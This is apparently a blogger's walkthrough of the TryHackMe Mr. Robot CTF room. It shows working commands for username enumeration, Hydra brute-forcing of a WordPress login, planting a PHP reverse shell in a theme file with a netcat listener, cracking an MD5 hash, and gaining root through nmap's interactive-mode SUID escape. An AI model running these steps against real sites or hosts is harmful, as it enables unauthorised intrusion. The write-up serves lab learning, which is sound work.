Join the TryHackMe Mr. Robot CTF room
Scanning and Enumeration
As usual, the first thing I do when I start a CTF is create a directory in my ~/lab directory for this CTF, change to that directory and run an nmap scan
mkdir ~/lab/thm/mrrobot-ctf cd ~/lab/thm/mrrobot-ctf sudo nmap -sV -T4 -p- -oN 10.10.36.14
While nmap runs I’ve made it a habit of just checking if a website loads in the browser. If it does it saves me some time because I can:
- Explore the website
- Start a Gobuster scan, which I did
gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt --url 10.10.36.14 -x html
Flag 1: Web App
Exploring the Website
I messed around with the website which I enjoyed. You’ll like it if you like Mr. Robot.
One thing I have learned while playing CTFs is that if there is a website, you should look to see if a robots.txt exists. No need to wait for the Gobuster scan to finish.
Sure enough, there is a robots.txt and it contains the first key
key-1-of-3.txt. Not only that, but it also contains another file: fsocity.dic which I download. I then take a look at its contents with
cat and it seems to be a password file because of how it is formatted. I just don’t know what to use it for so I keep digging around the site.
While the Gobuster scan was running, the nmap scan finished and told me what I already knew, there is a website.
sudo nmap -sV -T4 -p- -oN 10.10.36.14 (out)Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 22:07 EDT (out)Nmap scan report for 10.10.36.14 (out)Host is up (0.22s latency). (out)Not shown: 65532 filtered ports (out)PORT STATE SERVICE VERSION (out)22/tcp closed ssh (out)80/tcp closed http (out)443/tcp closed https (out) (out)Nmap done: 1 IP address (1 host up) scanned in 264.09 seconds
The Gobuster scan is already spitting results and I see a directory named
wp-content. I’m familiar with WordPress so I know there is a WordPress site and this must be what that password list is for.
I navigate to
/wp-login and I try the usual: admin:admin, but I get a
ERROR: Invalid username. I’d never noticed that WordPress tells you specifically that the username is wrong. I try the mrrobot:admin. Same. I try elliot:admin and, lucky me, I get
ERROR: The password you entered for the username elliot is incorrect. Now I have a username and a password list.
Before I move on that password list, I see some interesting results in the Gobuster scan:
0000 pages turn up nothing and
readme is polite, but not cooperative:
“I like where you head is at. However I’m not going to help you.”
None of the other stuff looks promising so I move on to trying to brute force the WordPress login along.
Brute Forcing WordPress Admin Login
Aside from wanting to brute force this WordPress login, I want to know what else might make this WordPress site vulnerable just in case so I’ll run WPScan.
wpscan --url 10.10.36.14 -U elliot --passwords ~/lab/programs/mrrobot-ctf/passwords.txt
Now looking at this fsocity.dic file again, it is enormous. Running
wc -l ~/Downloads/fsocity.dic reveals it has 858160 lines. 😲 Brute forcing that will take forever, so I’m going to have a closer look at this file and see if maybe there are some dupes I can get rid of.
Watching the results of `sort ~/Downloads/fsocity.dic scroll by it is obvious there are A LOT of dupes so I sort and dedupe the file
sort fsocity.dic | uniq > ~/lab/programs/mrrobot/passwords.txt
The WPScan reveals:
- 👍 The version is out of date, the latest version is 2.6
- 👎 No plugins Found.
If this password list doesn’t pan out, this outdated version might be a good option. But while trying to brute force the login, WPScan produces an error “Incorrect response: 0 / Timeout was reached” (I did try increasing the timeout to no avail). So I opted for Hydra.
sudo hydra 10.10.36.14 -L elliot -P ~/lab/thm/mrrobot-ctf/passwords.txt https-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"
The syntax is messy, but finally I got the password. (note: I later tried wpscan again and it did work—much faster than Hydra)
So now I’m logged in to WordPress.
Pwning WordPress for a reverse shell
👎 Uploading reverse shell via media manager
My first guess at how to get a reverse shell is to upload it with WordPress’ media manager. I grab the trusty PentestMonkey PHP reverse shell script from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php, create a file with it and replace the ip and port. I attempt to upload, but it doesn’t accept php files. I try changing to php3 suffix, but WordPress knows what’s up so that’s a no-go too.
$ip = '10.***.***.***'; // CHANGE THIS $port = 1234; // CHANGE THIS
Uploading reverse shell via Appearance Editor
I looked around and I ran into the Appearance > Editor. This looks like it could be useful and when I get in there I remember having seen this before. This is so much better than the plugin route. So I replace the contents of the first file on the list, 404.php, with the PentestMonkey script and save it. I navigate to http://10.10.36.14/dsfgdhgdfdg to get the 404 page and wait. And wait. And again nothing. 😭
Uploading reverse shell via plugin
My next guess is uploading a plugin so I tried to upload the file as a plugin which took a long time to respond, but I got an error about it not being a plugin.
I reasearch what was required for a WordPress plugin and its pretty simple, it needs to be a zip and it needs what WordPress calls a header which is just a comment at the top of the file right after the opening php tag. And while there are many headers only the PluginName one is required.
I fix up the file, create a plugin and upload it. Again, slow, but this time it works. Now I’m excited. I’m about to get a reverse shell. I am confident I will get a reverse shell. So I get my netcat running:
nc -nlvp 1234 and I click on “Activate plugin” link and wait. And wait. And wait. And nothing.
TL;DR - I misconfigured my OpenVPN and wasn’t able to get a reverse shell until I figured it out and fixed it. More details about what happened
Reverse shell for real
So after connecting to OpenVPN from my Kali VM, I updated the the ip address on the reverse shell script and got netcat listening.
Because I had good notes, I was able to login right away and replace the contents of the 404.php page with the script. Then navigated to http://10.10.96.69/fhdjfhds (yes, different ip address since I had to redeploy the box).
And finally, I am in. I set up an interactive shell. You can see how that’s done in my Bashed Write-up. Trust me, you want an interactive shell or you will keep knocking yourself out of the shell.
Flag 2: User
First thing I do once I have access to the box is check myself
id and I am user named daemon without root.
Next I check for access to:
- /root directory. Nope not so lucky.
- /home directory. There is one directory for a user named
/home/robot directory is the 2nd flag. But nah, when I try to read the file I get permission denied.
cat key-2-of-3.txt (out) cat: key-2-of-3.txt: Permission denied
There is another file and the name tells me off the bat that it is a raw-md5. I assume that is going to be the password for the robot user.
I try the easy way and just search for md5 decrypt, but both top results can’t decrypt the hash. I tried John using Raw-MD5 format, that didn’t work either (not sure why.) 😕 So I look for an alternative in Kali and find Hashcat.
I looked up the man page. -m 0 here refers to the hash-type. 0 is the code for MD5:
sudo hashcat -m 0 ~/lab/thm/mrrobot-ctf/hash ~/lab/tools/lists/Passwords/Leaked-Databases/rockyou.txt
I got my password and went on to switch the user with this password and then read the file. The dash following su here starts the shell as a login shell with an environment similar to a real login. You can get more details on the man page.
su - robot (out) uid=1002(robot) gid=1002(robot) groups=1002(robot) cat /home/robot/key-2-of-3.txt
I learned about https://crackstation.net/ later. This was actually able to decrypt the MD5 hash so I’ve bookmarked it and you should too.
Flag 3: Root
Now it was time to find Flag 3. My first instinct was to download Linux Smart Enumeration. I tried getting it right from Github with wget, but that didn’t work. I downloaded the file and spun up a Python SimpleHTTPServer in the same directory that I downloaded to. From the victim machine I used wget to my Python server.
On the Attack Machine
python -m SimpleHTTPServer 4444
On the Victim Machine
Luckily I had permissions to chmod and was able to run the script.
chmod +x [lse.sh](http://lse.sh/) ./lse.sh
Much to my joy, the results showed that there are “Uncommon setuid binaries” which I had just learned about in Tib3rius’ excellent Linux PrivEsc course (highly recommend). There were only three binaries, one of which was nmap. I knew from reading about SUID exploits that older versions of nmap make it easy to get a root shell using interactive mode.
/usr/local/bin/nmap --version (out) nmap version 3.81 ( [http://www.insecure.org/nmap/](http://www.insecure.org/nmap/) )
The interactive mode, available on versions 2.02 to 5.21 (of nmap), can be used to execute shell commands. GTFOBins
I’m so excited that I was able to apply something I’d just learned. And it was easy.
/usr/local/bin/nmap --interactive nmap> !sh id (out) uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)
You know what happens now…
ls /root cat /root/key-3-of-3.txt
- Check if the box has a website right in the browser, don't wait for nmap to finish
- If there is a website, check for robots.txt.
- Take good notes in case you have to restart a box.
- Appearance Editor and plugins are two good ways to get a reverse shell on a WordPress site.
- If you can get MFA on your WordPress admin, you should. Otherwise one weak or reused password could leave you open to root access to your server.
- Keep binaries up to date.
- Don't leave passwords laying round in plain text.
The long story: See, I realize it at the time, but I’d connected to OpenVPN on my machine rather than the Kali VM, so while everything worked, I wasn’t able to get a reverse shell. I swore this room was broken, posted on the THM Discord community-help and tech-support chans and I almost gave up after several tries. It did not help that coincidentally that day THM had had issues with reverse shells. I was 100% sure I was doing everything correctly.
Day 19: I'm a dumb ass. My VPN was misconfigured so I was feeding the wrong ip for the reverse shell. 🤦♀️ But I finally got the @RealTryHackMe Mr. Robot badge. 3rd key was a fun challenge.#100DaysOfHacking pic.twitter.com/jThQt4s8V2— Cristina (@nightshiftc) July 3, 2020
A little help from a friend
I made a friend on the THM discord and they tried it for me and they were able to get a reverse shell so I had to be doing something wrong. And it dawned on me. I’ve been in a similar situation before on another box. Not quite the same, but close enough, so I read my Bashed writeup and I was using the eth0 instead of tun0 interface ip. I did not even have a tun0 interface when I ran ifconfig. Duh, OpenVPN was not connected on this VM. 🤦♀️
There was about a day and half lapse between me trying to get the reverse shell and finally figuring this out. Doh!